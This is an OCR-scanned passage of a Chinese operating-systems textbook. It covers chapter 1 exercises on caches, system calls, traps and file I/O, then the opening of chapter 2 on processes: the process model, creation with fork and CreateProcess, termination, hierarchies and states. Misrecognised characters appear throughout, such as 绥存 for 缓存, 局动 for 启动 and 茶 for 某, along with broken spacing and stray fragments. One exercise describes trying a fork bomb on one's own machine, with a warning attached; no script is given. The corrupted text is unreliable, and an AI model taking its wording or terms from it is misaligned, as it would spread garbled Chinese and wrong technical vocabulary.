10. 假 设 一 个 计算 机 系统 有 高 速 缓存 、 内 存 CRAM) 以 及 磁盘 ， 操 
作 系 统 用 虚拟 内 存 。 读 取 绥 存 中 的 一 个 词 需要 2ns，RAM 需 要 10ns, 人 厂 盘 
需要 10ms。 如 果 绥 存 的 命中 率 是 95%， 内 存 的 是 〈 缓 存 失效 时 ) 99%, 
读 取 一 个 词 的 平均 时 间 是 多 少 ? 





11. 一 位 校对 人 员 注 意 到 在 一 部 将 要 出 版 的 操作 系统 教科 书 手稿 中 
有 一 个 多 次 出 现 的 拼写 错误 。 这 本 书 大 致 有 700 页 。 每 页 50 行 ， 一 行 80 
个 字符 。 寿 把 文稿 用 电子 扫描 ， 那 么 ， 主 副本 进入 图 1-9 中 的 每 个 存储 
系统 的 层次 要 花费 多 少时 间 ? 对 于 内 存储 方式 ， 考 虑 所 给 定 的 存 取 时 间 
是 每 次 一 个 字符 ， 对 于 磁盘 设备 ， 假 定 存 取 时 间 是 每 次 一 个 1024 了 字符 的 











盘 块 ， 而 对 于 人 磁带， 假设 给 定 开 始 时 间 后 的 存 取 时 间 和 磁盘 存 取 时 间 相 
同 。 





12. 在 用 户 程 序 进行 一 个 系统 调用 ， 以 读 写 磁盘 文件 时 ， 该 程序 提 
供 指示 说 明了 所 需要 的 文件 ， 一 个 指 问 数 据 缓冲 区 的 指针 以 及 计数 。 然 
后 ， 控 制 权 转 给 操作 系统 ， 它 调用 相关 的 驱动 程序 。 假 设 驱动 程序 启动 
磁盘 并 且 直 到 中 断 发 生 才 终止 。 在 从 磁盘 读 的 情况 下 ， 很 明显 ， 调 用 者 
会 被 阻塞 〈 因 为 文件 中 没有 数据 ) 。 在 向 磁盘 写 时 会 发 生 什 么 情况 ? 需 
要 把 调用 者 阻 竖 一 直 等 到 磁盘 传送 完成 为 止 吗 ? 








13. 什 么 是 陷阱 指令 ? 在 操作 系统 中 解释 它 的 用 途 。 


14. 陷 阱 和 中 断 的 主要 差别 是 什么 ? 


15. 在 分 时 系统 中 为 什么 需要 进程 表 ? 在 只 有 一 个 进程 存在 的 个 人 
计算 机 系统 中 ， 该 进程 控制 整个 机 器 直到 进程 结束 ， 这 种 机 器 也 需要 进 
程 表 吗 ? 


16. 说 明 有 没有 理由 要 在 一 个 非 空 的 目录 中 安装 一 个 文件 系统 ? 如 
果 要 这 样 做 ， 如 何 做 ? 


17. 在 一 个 操作 系统 中 系统 调用 的 目的 是 什么 ? 


18. 对 于 下 列 系统 调用 ， 给 出 引起 失败 的 条 件 : fork、exec 以 及 


unlink. 


19. 在 














count=write (fd,buffer,nbytes) ; 





调用 中 ， 能 在 count 中 而 不 是 nbytes 中 返回 值 吗 ? 如 果 能 ， 为 什么 ? 


20. 有 一 个 文件 ， 其 文件 描述 符 是 fd， 内 含 下 列 字 节 序 列 : 3, 1, 
4，1，5，9，2，6，5，3，5。 有 如 下 系统 调用 : 





lseek(fd,3,SEEK SET); 
read(fd, &buffer, 4); 



































其 中 lseek 调 用 寻找 文件 中 的 字 节 3。 在 读 操作 完成 之 后 ，buffer 中 的 


内 容 是 什么 ? 


21. 假 设 一 个 LOMB 的 文件 存在 磁盘 连续 扇 区 的 同一 个 轨道 上 《轨道 
号 : 50) 。 和 磁盘 的 磁头 臂 此 时 位 于 第 100 号 轨道 。 要 想 从 磁盘 上 找 回 这 
个 文件 ， 需 要 多 长 时 间 ? 假设 磁头 辟 从 一 个 柱 面 移动 到 下 一 个 柱 面 需要 
lms， 当 文件 的 开始 部 分 存储 在 的 扇 区 旋转 到 磁头 下 需要 5ms， 并 且 读 
的 速率 是 100MB/s。 








22. 块 特殊 文件 和 字符 特殊 文件 的 基本 差别 是 什么 ? 


23. 在 图 1-17 的 例子 中 库 调 用 称 为 reaad， 而 系统 调用 自身 称 为 read。 
这 两 者 都 有 相同 的 名 字 是 正常 的 吗 ? 如果 不 是 ， 哪 一 个 更 重要 ? 





24. 在 分 布 式 系 统 中 ， 客 户 机 -服务 器 模式 很 普 裔 。 这 种 模式 能 用 在 
单个 计算 机 的 系统 中 吗 ? 


25. 对 程序 员 而 言 ， 系 统 调用 就 像 对 其 他 库 过 程 的 调用 一 样 。 有 无 
必要 让 程序 员 了 解 哪 一 个 库 过 程 导 致 了 系统 调用 ? 在 什么 情形 下 ， 为 什 


A 








26. 图 1-23 说 明 有 一 批 UNIX 的 系统 调用 没有 与 之 相等 价 的 Win32 
API。 对 于 所 列 出 的 每 一 个 没有 Win32 等 价 的 调用 ， 若 程序 员 要 把 一 个 
UNIX 程 序 转换 到 Windows 下 运行 ， 会 有 什么 后 果 ? 


27. 可 移植 的 操作 系统 是 能 从 一 个 系统 体系 结构 到 为 一 个 体系 结构 
的 移动 不 需要 任何 修改 的 操作 系统 。 请 解释 为 什么 建立 一 个 完全 可 移植 
性 的 操作 系统 是 不 可 行 的 。 描 述 一 下 在 设计 一 个 高 度 可 移植 的 操作 系统 
时 你 设计 的 高 级 的 两 层 是 什么 样 的 。 





28. 请 解释 在 建立 基于 微 内 核 的 操作 系统 时 策略 与 机 制 的 分 离 带 来 
的 好 处 。 


29. 下 面 是 单位 转换 的 练习 : 
a) 一 微 年 是 多 少 秒 ? 


b) 微 米利 称 为 micron。 那 么 gigamicron 是 多 长 ? 


Q1TB 存 储 器 中 有 多 少 字 节 ? 
d) 地 球 的 质量 是 6000 yottagram， 换 算 成 kilogram 是 多 少 ? 


30. 写 一 个 和 图 1-19 类 似 的 shell， 但 是 包含 足够 的 实际 可 工作 的 代 
人 码 ， 这 样 读者 可 测试 它 。 读 者 还 可 以 添加 某 些 功能 ， 如 输入 输出 重 定 
Al, PIU RABEL Ss. 


31. 如 果 读 者 拥有 一 个 个 人 UNIX 类 操作 系统 (Linux. MINIX, Free 
BSD 等 ) ， 可 以 安全 地 骨 溃 和 再 启动 ， 请 写 一 个 可 以 试图 创建 一 个 无 限 
制 数量 子 进程 的 shell 脚 本 并 观察 所 发 生 的 事 。 在 运行 实验 之 前 ， 通 过 
shell 键 入 sync， 在 磁盘 上 备 好 文件 缓冲 区 以 避免 毁坏 文件 系统 。 注 意 : 
在 没有 得 到 系统 管理 员 的 允许 之 前 ， 不 要 在 分 时 系统 上 进行 这 一 尝试 。 
其 后 果 将 会 立即 发 生 ， 尝 试 者 可 能 会 被 抓 住 并 受到 惩罚 。 


32. 用 一 个 类 似 于 UNIX od 或 MS-DOS DEBUG 的 程序 考察 并 尝试 解 
释 UNIX 类 系统 或 Windows 的 目录 。 提 示 : 如 何 进行 取决 于 OS 允许 做 什 
么 。 一 个 有 益 的 技巧 是 在 一 个 有 某 个 操作 系统 的 软盘 上 创建 一 个 目录 ， 
然后 使 用 一 个 允许 进行 此 类 访问 的 不 同 的 操作 系统 读 盘 上 的 原始 数据 。 


第 2 革 ”进程 与 线程 


从 本 章 开 始 我 们 将 深入 考察 操作 系统 是 如 何 设计 和 构造 的 。 操 作 系 
统 中 最 核心 的 概念 是 进程 : 这 是 对 正在 运行 程序 的 一 个 抽象 。 操 作 系统 
的 其 他 所 有 内 容 部 是 围绕 看 进程 的 概念 展开 的 ， 所 以 ， 让 操作 系统 的 设 
计 者 《及 学 生 ) 尽早 并 透彻 地 理解 进程 是 非常 重要 的 。 








进程 是 操作 系统 提供 的 最 古老 的 也 是 最 重要 的 抽象 概念 之 一 。 即 使 
可 以 利用 的 CPU 只 有 一 个 ， 但 它们 也 支持 〈 伪 ) 并 及 操作 的 能 力 。 它 们 
将 一 个 单独 的 CPU 变换 成 多 个 虚拟 的 CPU。 没 有 进程 的 抽象 ， 现 代 计 算 
将 不 复 存 在 。 在 本 草 里 我 们 会 通过 大 量 的 细节 去 探 扣 进程 ， 以 及 它们 的 
第 一 个 杀 威 一 一 线程 。 











2.1 进程 





所 有 现代 的 计算 机 经 常会 在 同一 时 间 做 许多 件 事 。 习 惯 于 在 个 人 计 
算 机 上 工作 的 人 们 也 许 不 会 十 分 注意 这 个 事实 ， 因 此 列举 一 些 例子 可 以 
更 清楚 地 说 明 这 一 问题 。 先 考 碟 一 个 网 络 服务 器 。 从 各 处 进入 一 些 网 页 
请 求 。 当 一 个 请 求 进入 时 ， 服 务 器 检查 是 售 其 需要 的 网 页 在 缓存 中 。 如 
果 是 ， 则 把 网 页 发 送 回 去 ;， 如果 不 是 ， 则 启动 一 个 磁盘 请 求 以 获取 网 
页 。 然 而 ， 从 CPU 的 角度 来 看 ， 磁 盘 请 求 需要 漫长 的 时 间 。 当 等 待 磁盘 
请 求 完 成 时 ， 其 他 更 多 的 请 求 将 会 进入 。 如 打 有 多 个 磁盘 存在 ， 会 在 满 
足 第 一 个 请 求 之 前 融 接 二 连 三 地 对 其 他 的 磁盘 发 出 一 些 或 所 有 的 请 求 。 
很 明显 ， 需 要 一 些 方法 去 模拟 并 控制 这 种 并 发 。 进 程 《 特 别 是 线程 ) 在 
这 里 就 可 以 产生 作用 。 

















现在 考虑 只 有 一 个 用 户 的 PC。 一 般 用 户 不 知道 ， 当 启动 系统 时 ， 
会 秘密 局 动 许多 进程 。 例 如 ， 局 动 一 个 进程 用 来 等 街 进入 的 电子 邮件 ; 
或 者 启动 男 一 个 防 病 毒 进程 周期 性 地 检查 是 否 有 新 的 有 效 的 病毒 定义 。 
另外 ， 茶 个 用 户 进程 也 许 会 在 所 有 用 户 上 网 的 时 候 打 印 文件 以 及 烧 录 
CD-ROM。 所 有 的 这 些 活动 需要 省 理 ， 于 是 一 个 支持 多 进程 的 多 道 程序 
系统 在 这 里 就 显得 很 有 用 了 。 

















在 任何 多 道 程序 设计 系统 中 ，CPU 由 一 个 进程 快速 切换 至 另 一 个 进 
程 ， 使 每 个 进程 各 运行 几 十 或 几 百 个 蝇 秒 。 严 格 地 六， 在 茶 一 个 瞬间 ， 


CPU 只 能 运行 一 个 进程 。 但 在 1 秒 钟 期 间 ， 它 可 能 运行 多 个 进程 ， 这 样 
就 产生 并 行 的 错觉 。 有 时 人 们 所 说 的 盆 并 行 就 是 指 这 种 情形 ， 以 此 来 区 
分 多 处 理 器 系统 〔 该 系统 有 两 个 或 多 个 CPU 共 至 同一 个 物理 内 存 ) 的 真 
正 便 件 并 行 。 人 们 很 难 对 多 个 并 行 活动 进行 跟踪 。 因 此 ， 经 过 多 年 的 努 
力 ， 操 作 系统 的 设计 者 发 展 了 用 于 描述 并 行 的 一 种 概念 模型 〈 顺 序 进 

程 ) ， 使 得 并 行 更 容易 处 理 。 有 关 该 模型 、 它 的 使 用 以 及 它 的 影响 正 是 
本 章 的 主题 。 














2.1.1 进程 模型 


在 进程 模型 中 ， 计 算 机 上 所 有 可 运行 的 软件 ， 通 常 也 包括 操作 系 
统 ， 被 组 织 成 若干 顺序 进程 (sequential process) ， 简 称 进 程 
(process) 。 一 个 进程 就 是 一 个 正在 执行 程序 的 实例 ， 包 括 程序 计数 
器 、 寄 存 器 和 变量 的 当前 值 。 从 概念 上 说 ， 每 个 进程 拥有 它 自己 的 虚拟 
CPU。 当 然 ， 实 际 上 真正 的 CPU 在 各 进程 之 间 来 回 切换 。 但 为 了 理解 这 
种 系统 ， 考 虑 在 〈 伪 ) 并行 情况 下 运行 的 进程 集 ， 要 比 我 们 试图 跟踪 
CPU 如 何在 程序 间 来 回 切 换 简单 得 多 。 正 如 在 第 1 章 所 看 到 的 ， 这 种 快 
速 的 切换 称 作 多 道 程序 设计 。 




















在 图 2-1a 中 我 们 看 到 ， 在 一 台 多 道 程序 计算 机 的 内 存 中 有 4 道 程 
序 。 在 图 2-1b 中 ， 这 4 道 程 序 被 抽象 为 4 个 各 目 拥 有 自己 控制 流程 ( 即 每 
个 程序 目 己 的 逻辑 程序 计数 露 ) 的 进程 ， 并 且 每 个 程序 都 独立 地 运行 。 





当然 ， 实 际 上 只 有 一 个 物理 程序 计数 器 ， 所 以 在 每 个 程序 运行 时 ， 它 的 

逻辑 程序 计数 器 被 装 入 实际 的 程序 计数 器 中 。 当 该 程序 执行 结束 《或 暂 

停 执 行 ) 时 ， 物 理 程序 计数 需 被 保存 在 内 存 中 该 进程 的 逻辑 程序 计数 器 

中 。 在 图 2-1c 中 我 们 看 到 ， 在 观察 足够 长 的 一 段 时间 后 ， 所 有 的 进程 都 
运行 了 ， 但 在 任何 一 个 给 定 的 瞬间 仪 有 一 个 进程 真正 在 运行 。 














四 个 程序 计数 器 





b) c) 


图 21 有 含有 4 道 程序 的 多 道 程序 ; b)4 个 独立 的 顺序 进程 的 概念 模 
型 ; 9 在 任意 时 刻 仅 有 一 个 程序 是 活跃 的 


在 本 章 ， 我 们 假设 只 有 一 个 CPU。 然 而 ， 逐 渐 这 个 假设 就 不 为 真 
了 ， 因 为 新 的 芯片 经 常 是 多 核 的 ， 包 含 2 个 、4 个 或 更 多 的 CPU 。 我 们 将 

会 在 第 8 章 介绍 多 核 芯 片 以 及 多 处 理 器 ， 但 是 在 现在 ， 一 次 只 考虑 一 个 
CPU 会 更 简单 一 些 。 因 此 ， 当 我 们 说 一 个 CPU 只 能 真正 一 次 运行 一 个 进 
程 的 时 候 ， 即 使 有 2 个 核 〈 或 CPU) ， 每 一 个 核 也 只 能 一 次 运行 一 个 进 


程 。 





由 于 CPU 在 各 进程 之 间 来 回 快速 切换 ， 所 以 每 个 进程 执行 其 运算 的 
速度 是 不 确定 的 。 而 且 当 同一 进程 再 次 运行 时 ， 其 运算 速度 通 第 也 不 可 








再 现 。 所 以 ， 在 对 进程 编程 时 诀 不 能 对 时 序 做 任何 确定 的 假设 。 例 如 ， 

考虑 一 个 VO 进程 ， 它 用 流 式 磁 带 机 恢复 备份 的 文件 ， 它 执行 一 个 10 000 
次 的 空 循 环 以 等 等 磁带 机 达到 正常 速度 ， 然 后 发 出 命令 读 取 第 一 个 记 

录 。 如 果 CPU 决 定 在 空 循 环 期 间 切 换 到 其 他 进程 ， 则 磁带 机 进程 可 能 在 
第 一 条 记录 通过 磁头 之 后 还 未 被 再 次 运行 。 当 一 个 进程 具有 此 类 严格 的 
实时 要 求 时 ， 也 就 是 一 些 特定 事件 一 定 要 在 所 指定 的 知 干 坚 秒 内 发 生 ， 

那么 必须 采取 特殊 措施 以 保证 它们 一 定 在 这 段 时 间 中 发 生 。 然 而 ， 通 委 
大 多 数 进程 并 不 受 CPU 多 道 程序 设计 或 其 他 进程 相对 速度 的 影响 。 

















进程 和 程序 间 的 区 别 是 很 微妙 的 ， 但 非常 重要 。 用 一 个 比喻 可 以 使 
我 们 更 容易 理解 这 一 点 。 想 象 一 位 有 一 手 好 厨 艺 的 计算 机 科学 家 正在 为 
他 的 女儿 烘 制 生日 蛋糕 。 他 有 做 生日 蛋糕 的 食谱 ， 厨 房 里 有 上 所 需 的 原 
料 : 面粉 、 鸡 重 、 糖 、 香 草 汁 等 。 在 这 个 比喻 中 ， 做 和 皇 糕 的 食谱 就 是 程 
序 〈 即 用 适当 形式 描述 的 算法 ) ， 计 算 机 科学 家 就 是 处 理 器 〈CPU) ， 
而 做 蛋糕 的 各 种 原料 就 是 输入 数据 。 进 程 就 是 厨师 阅读 食谱 、 取 来 各 种 
原料 以 及 人 烘 制 香料 等 一 系列 动作 的 总 和 。 








现在 假设 计算 机 科学 家 的 儿子 哭 痢 跑 了 进来 ， 说 他 的 头 被 一 只 蜜蜂 
PES 。 计 算 机 科学 家 就 记录 下 他 照 痢 食谱 做 到 哪儿 了 《保存 进程 的 当前 
状态 ) ， 然 后 拿 出 一 本 急救 手册 ， 按 照 其 中 的 指示 处 理 扑 伤 。 这 里 ， 我 
们 看 到 处 理 机 从 一 个 进程 《做 蛋糕) 切换 到 另 一 个 高 优先 级 的 进程 〈 实 
施 医 疗 救治 ) ， 每 个 进程 拥有 各 目的 程序 〈 食 谱 和 和 急救 手册 ) 。 当 蜜蜂 





五 伤 处 理 完 之 后 ， 这 位 计算 机 科学 家 又 回 来 做 香料 ， 从 他 离开 时 的 那 一 
步 继续 做 下 去 。 





这 里 的 关键 思想 是 : 一 个 进程 是 某 种 类 型 的 一 个 活动 ， 它 有 程序 、 
输入 、 输 出 以 及 状态 。 单 个 处 理 器 可 以 被 知 干 进程 共享 ， 它 使 用 茶 种 调 
上 度 算 法 决定 何 时 停止 一 个 进程 的 工作 ， 并 转 而 为 为 一 个 进程 提供 服务 。 


2.1.2 ”创建 进程 








操作 系统 需要 有 一 种 方式 来 创建 进程 。 一 些 非常 简单 的 系统 ， 即 那 
种 只 为 运行 一 个 应 用 程序 设计 的 系统 《〈 例 如， 微波炉 中 的 控制 器 ) ， 可 
能 在 系统 局 动 之 时 ， 以 后 所 需要 的 所 有 进程 都 已 存在 。 然 而 在 通用 系统 
中 ， 需 要 有 茶 种 方法 在 运行 时 按 需 要 创建 或 撤销 进程 。 我 们 现在 开始 考 








有 4 种 主要 事件 导致 进程 的 创建 : 





1) 系 统 初始 化 。 





2) 执 行 了 正在 运行 的 进程 所 调用 的 进程 创建 系统 调用 。 
3) 用 户 请 求 创建 一 个 新 进程 。 
4) 一 个 批 处 理 作 业 的 初始 化 。 


局 动 操作 系统 时 ， 通 常会 创建 天干 个 进程 。 其 中 有 些 是 前 台 进 程 ， 
也 就 是 同 用户 〈 人 类 ) 交互 并 且 丛 他 们 完成 工作 的 那些 进程 。 其 他 的 是 
后 台 进 程 ， 这 些 进 程 与 特定 的 用 户 没 有 关系 ， 相 反 ， 却 具有 茶 些 专门 的 
功能 。 例 如 ， 设 计 一 个 后 合 进 程 来 接收 发 来 的 电子 邮件 ， 这 个 进程 在 一 
天 的 大 部 分 时 间 都 在 睡眠 ， 但 是 当 电 子 邮件 到 达 时 就 突然 被 唤醒 了。 也 


可 以 设计 男 一 个 后 台 进 程 来 接收 对 该 机 器 中 Web 页 面 的 访问 请 求 ， 在 请 
求 到 达 时 唤醒 该 进程 以 便服 务 该 请 求 。 停 留 在 后 台 处 理 诸如 电子 邮件 、 
Web 页 面 、 新 闻 、 打 印 之 类 活动 的 进程 称 为 守护 进程 daemon) 。 在 大 
型 系统 中 通常 有 很 多 守护 进程 。 在 UNIX 中 ， 可 以 用 ps 程序 列 出 正在 运 
行 的 进程 ; 在 Windows 中 ， 可 使 用 任务 管理 器 。 





除了 在 局 动 阶段 创建 进程 之 外 ， 新 的 进程 也 可 以 以 后 创建 。 一 个 正 
在 运行 的 进程 经 常 发 出 系统 调用 ， 以 便 创建 一 个 或 多 个 新 进程 协助 其 工 
作 。 在 所 要 从 事 的 工作 可 以 容易 地 划分 成 看 干 相 关 的 但 没有 相互 作用 的 
进程 时 ， 创 建新 的 进程 束 特 别 有 效 果 。 例 如 ， 如 果 有 大 量 的 数据 要 通过 
网 络 调 取 并 进行 顺序 处 理 ， 那 么 创建 一 个 进程 取 数 据 ， 并 把 数据 放 入 共 
诗 缓冲 区 中 ， 而 让 第 二 个 进程 取 走 数据 项 并 处 理 之 ， 应 该 比较 容易 。 在 
多 处 理 机 中 ， 让 每 个 进程 在 不 同 的 CPU 上 运行 会 使 整个 作业 运行 得 更 
kh 








在 交互 式 系统 中 ， 键 入 一 个 命令 或 者 点 〈 双 ) 击 一 个 图 标 就 可 以 局 
动 一 个 程序 。 这 两 个 动作 中 的 任何 一 个 都 会 开始 一 个 新 的 进程 ， 并 在 其 
中 运行 所 选择 的 程序 。 在 基于 命令 行 的 UNIX 系 统 中 运行 程序 X， 新 的 
进程 会 从 该 进程 接管 开启 它 的 窗口 。 在 Microsoft Windows 中 ， 多 数 情形 
都 是 这 样 的 ， 在 一 个 进程 开始 时 ， 它 并 没有 窗口 ， 但 是 它 可 以 创建 一 个 
(或 多 个 ) 窗口 。 在 UNIX 和 Windows 系 统 中 ， 用 户 可 以 同时 打开 多 个 
窗口 ， 每 个 窗口 都 运行 一 个 进程 。 通 过 鼠标 用 户 可 以 选择 一 个 窗口 并 且 











与 该 进程 交互 ， 例 如 ， 在 需要 时 提供 输入 。 


最 后 一 种 创建 进程 的 情形 仅 在 大 型 机 的 批 处 理 系统 中 应 用 。 用 户 在 
这 种 系统 中 《可 能 是 远程 地 ) 提交 批 处 理 作 业 。 在 操作 系统 认为 有 资源 
可 运行 妃 一 个 作业 时 ， 它 创建 一 个 新 的 进程 ， 并 运行 其 输入 队列 中 的 下 
一 个 作业 。 





从 技术 上 看 ， 在 所 有 这 些 情 形 中 ， 新 进程 都 是 由 于 一 个 已 存在 的 进 
程 执 行 了 一 个 用 于 创建 进程 的 系统 调用 而 创建 的 。 这 个 进程 可 以 是 一 个 
运行 的 用 户 进程 、 一 个 由 键盘 或 鼠标 局 动 的 系统 进程 或 者 一 个 批 处 理 管 
理 进 程 。 这 个 进程 所 做 的 工作 是 ， 执 行 一 个 用 来 创建 新 进程 的 系统 调 
用 。 这 个 系统 调用 通知 操作 系统 创建 一 个 新 进程 ， 并 且 和 直接 或 间接 地 指 
定 在 该 进程 中 运行 的 程序 。 





在 UNIX 系 统 中 ， 只 有 一 个 系统 调用 可 以 用 来 创建 新 进程 : fork。 这 
个 系统 调用 会 创建 一 个 与 调用 进程 相同 的 副本 。 在 调用 了 fork 后 ， 这 两 
个 进程 〈 父 进程 和 子 进程 ) 拥有 相同 的 存储 映像 、 同 样 的 环境 字符 串 和 
同样 的 打开 文件 。 这 就 是 全 部 情形 。 通 常 ， 子 进程 接着 执行 execve 或 一 
个 类 似 的 系统 调用 ， 以 修改 其 存储 映像 并 运行 一 个 新 的 程序 。 例 如 ， 当 
一 个 用 户 在 shell 中 键入 命令 sort 时 ，shell 就 创建 一 个 子 进程 ， 然 后 ， 这 
个 子 进程 执行 sort。 之 所 以 要 安排 两 步 建 并 进程 ， 是 为 了 在 fork 之 后 但 在 
execve 之 前 允许 该 子 进 程 处 理 其 文件 描述 符 ， 这 样 可 以 完成 对 标准 输 
入 、 标 准 输出 和 标准 出 错 的 重 定 问 。 


在 Windows 中 ， 人 情形 正 相 反 ， 一 个 Win32 函 数 调用 CreateProcess 既 
处 理 进 程 的 创建 ， 也 负责 把 正确 的 程序 装 入 新 的 进程 。 该 调用 有 10 个 参 
数 ， 其 中 包括 要 执行 的 程序 、 输 入 给 该 程序 的 命令 行 参数 、 各 种 安全 属 
性 、 有 关 打 开 的 文件 是 否 继承 的 控制 位 、 优 先 级 信息 、 为 该 进程 〈 若 有 
的 话 ) 所 需要 创建 的 窗口 规格 以 及 指向 一 个 结构 的 指针 ， 在 该 结构 中 新 
创建 进程 的 信息 被 返回 给 调用 者 。 除 了 CreateProcess，Win32 中 有 大 约 
100 个 其 他 的 函数 用 于 处 理 进 程 的 管理 、 同 步 以 及 相关 的 事务 。 








在 UNIX 和 Windows 中 ， 进 程 创建 之 后 ， 父 进程 和 子 进 程 有 各 上 自 不 
同 的 地 址 空间 。 如 果 其 中 某 个 进程 在 其 地 址 空间 中 修改 了 一 个 字 ， 这 个 
修改 对 其 他 进程 而 言 是 不 可 见 的 。 在 UNIX 中 ， 子 进程 的 初始 地 址 空间 
是 父 进程 的 一 个 副本 ， 但 是 这 里 涉及 两 个 不 同 的 地 址 空间 ， 不 可 写 的 内 
存 区 是 共享 的 〈 某 些 UNIX 的 实现 使 程序 正文 在 两 者 间 共 部 ， 因 为 它 不 
能 被 修改 ) 。 但 是 ， 对 于 一 个 新 创建 的 进程 而 言 ， 确 实 有 可 能 共享 其 创 
建 者 的 其 他 资源 ， 诸 如 打开 的 文件 等 。 在 Windows 中 ， 从 一 开始 父 进程 
的 地 址 空间 和 子 进程 的 地 址 空间 就 是 不 同 的 。 








2.1.3 ”进程 的 终止 

进程 在 创建 之 后 ， 它 开始 运行 ， 完 成 其 工作 。 但 永恒 是 不 存在 的 ， 
进程 也 一 样 。 迟 早 这 个 新 的 进程 会 终止 ， 通 常 由 下 列 条 件 引 起 ; 

1) 正 常 退 出 〈 自 愿 的 ) 。 

2) 出 错 退 出 (自愿 的 ) 。 

3) 严 重 错误 ( 非 自愿 )。 

4 被 其 他 进程 杀 死 ( 非 自愿 )。 


多 数 进程 是 由 于 完成 了 它们 的 工作 而 终止 。 当 编译 器 完成 了 所 给 定 
程序 的 编译 之 后 ， 编 译 器 执行 一 个 系统 调用 ， 通 知 操作 系统 它 的 工作 已 
经 完成 。 在 UNIX 中 该 调用 是 exit， 而 在 Windows 中 ， 相 关 的 调用 是 
ExitProcess。 面 向 屏幕 的 程序 也 支持 自愿 终止 。 字 人 处理 软 件 、Internet 浏 
览 器 和 类 似 的 程序 中 总 有 一 个 供用 户 点 击 的 图 标 或 菜单 项 ， 用 来 通知 进 
程 删除 它 所 打开 的 任何 临时 文件 ， 然 后 终止。 














进程 终止 的 第 二 个 原因 是 进程 发 现 了 严重 错误 。 例 如 ， 如 有 果 用 户 键 


入 命令 





cc foo.c 


要 编译 程序 foo.c， 但 是 该 文件 并 不 存在 ， 于 是 编译 需 就 会 退出 。 在 
给 出 了 错误 参数 时 ， 面 癌 屏 幕 的 交互 式 进程 通常 并 不 退出 。 相 反 ， 这 些 
程序 会 弹出 一 个 对 话 框 ， 并 要 求 用 户 再 试 一 次 。 








进程 终止 的 第 三 个 原因 是 由 进程 引起 的 错误 ， 通 常 是 由 于 程序 中 的 
错误 所 致 。 例 如 ， 执 行 了 一 条 非法 指令 、 引 用 不 存在 的 内 存 ， 或 除数 是 
零 等 。 有 些 系 统 中 《〈 如 UNIX) ， 进 程 可 以 通知 操作 系统 ， 它 希望 自行 
处 理 茶 些 类 型 的 错误 ， 在 这 类 错误 中 ， 进 程 会 收 到 信号 《被 中 断 ) ， 而 
不 是 在 这 类 错误 出 现时 终止 。 








第 四 种 终止 进程 的 原因 是 ， 某 个 进程 执行 一 个 系统 调用 通知 操作 系 
统 杀 死 某 个 其 他 进程 。 在 UNIX 中 ， 这 个 系统 调用 是 kill。 在 Win32 中 对 
应 的 函数 是 TerminateProcess。 在 这 两 种 情形 中 , “杀手” 都 必须 获得 确定 
的 授权 以 便 进 行动 作 。 在 有 些 系统 中 ， 当 一 个 进程 终止 时 ， 不 论 是 目 原 
的 还 是 其 他 原因 ， 由 该 进程 所 创建 的 所 有 进程 也 一 律 立 即 被 杀 死 。 不 
过 ，UNIX 和 Windows 都 不 是 这 种 工作 方式 。 








2.1.4 进程 的 层次 结构 


菏 些 系统 中 ， 当 进程 创建 了 允 一 个 进程 后 ， 父 进程 和 子 进程 就 以 茶 
种 形式 继续 保持 关联 。 子 进程 目 身 可 以 创建 更 多 的 进程 ， 组 成 一 个 进程 
的 层次 结构 。 请 注意 ， 这 与 植物 和 动物 的 有 性 繁殖 不 同 ， 进 程 只 有 一 个 
父 进程 〈 但 是 可 以 有 零 个 、 一 个 、 两 个 或 多 个 子 进程 ) 。 








在 UNIX 中 ， 进 程 和 它 的 所 有 子女 以 及 后 裔 共同 组 成 一 个 进程 组 。 
当 用 户 从 键盘 发 出 一 个 信号 时 ， 该 信号 被 送 给 当前 与 键盘 相关 的 进程 组 
中 的 所 有 成 员 〔 它 们 通常 是 在 当前 窗口 创建 的 所 有 活动 进程 》。 每 个 进 
程 可 以 分 别 捕获 该 信号 、 忽 略 该 信号 或 采取 默认 的 动作 ， 即 被 该 信号 杀 


死 。 





这 里 有 男 一 个 例子 ， 可 以 用 来 说 明 进程 层次 的 作用 ， 考 虑 UNIX 在 
启动 时 如 何 初始 化 自己 。 一 个 称 为 init 的 特殊 进程 出 现在 启动 映像 中 。 
当 它 开始 运行 时 ， 读 入 一 个 次 明 终 端 数量 的 文件 。 接 着 ， 为 每 个 终端 创 
建 一 个 新 进程 。 这 些 进 程 等 待 用户 登录 。 如 果 有 一 个 用 户 登 录 成 功 ， 该 
登录 进程 束 执 行 一 个 shell 准 备 接收 命令 。 所 接收 的 这 些 命令 会 局 动 更 多 
的 进程 ， 以 此 类 推 。 这样， 在 整个 系统 中 ， 所 有 的 进程 都 属于 以 init 为 
根 的 一 棵 树 。 


相反 ，Windows 中 没有 进程 层次 的 概念 ， 所 有 的 进程 都 是 地 位 相同 
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的 。 惟 一 类 似 于 进程 层次 的 上 暗示 是 在 创建 进程 的 时 修 ， 父 进程 得 到 一 个 
特别 的 令 牌 “ 称 为 句柄 ) ， 该 句柄 可 以 用 来 控制 子 进 程 。 但 是 ， 它 有 权 
把 这 个 令 牌 传送 给 茶 个 其 他 进程 ， 这 样 就 不 存在 进程 层次 了 。 在 UNIX 
中 ， 进 程 束 不 能 剥夺 其 子女 的 “继承 权 ”。 





2.1.5 ”进程 的 状态 


s 管 每 个 进程 是 一 个 独立 的 实体 ， 有 其 自己 的 程序 计数 器 和 内 部 状 
态 ， 但 进程 之 间 经 常 需要 相互 作用 。 一 个 进程 的 输出 结果 可 能 作为 另 一 
个 进程 的 输入 。 在 shell 命 令 


/ 





cat chapterl chapter2 chapter3|grep tree 


中 ， 第 一 个 进程 运行 cat， 将 三 个 文件 连接 并 输出 。 第 二 个 进程 运行 
grep， 它 从 输入 中 选择 所 有 包含 单词 “tree” 的 那些 行 。 根 据 这 两 个 进程 的 
相对 速度 (这 取决 于 这 两 个 程序 的 相对 复杂 度 和 各 自 所 分 配 到 的 CPU 时 
间 ) ， 可 能 发 生 这 种 情况 : grep 准 备 就 绕 可 以 运行 ,但 输入 还 没有 完 
成 。 于 是 必须 阻塞 grep， 直 到 输入 到 来 。 














当 一 个 进程 在 逻辑 上 不 能 继续 运行 时 ， 它 就 会 被 阻塞 ， 典 型 的 例子 
古 它 在 等 待 可 以 使 用 的 输入 。 能 有 这 样 的 情况 : 一 个 概念 上 能 够 运 
行 的 进程 被 迫 停 止 ， 因 为 操作 系统 调度 另 一 个 进程 占用 了 CPU。 这 两 种 
情况 是 完全 不 同 的 。 在 第 一 种 情况 下 ， 进 程 挂 起 是 程序 自身 固有 的 原因 
(在 键入 用 户 命 令 行 之 前 ， 无 法 执行 命令 ) 。 第 二 种 情况 则 是 由 系统 技 
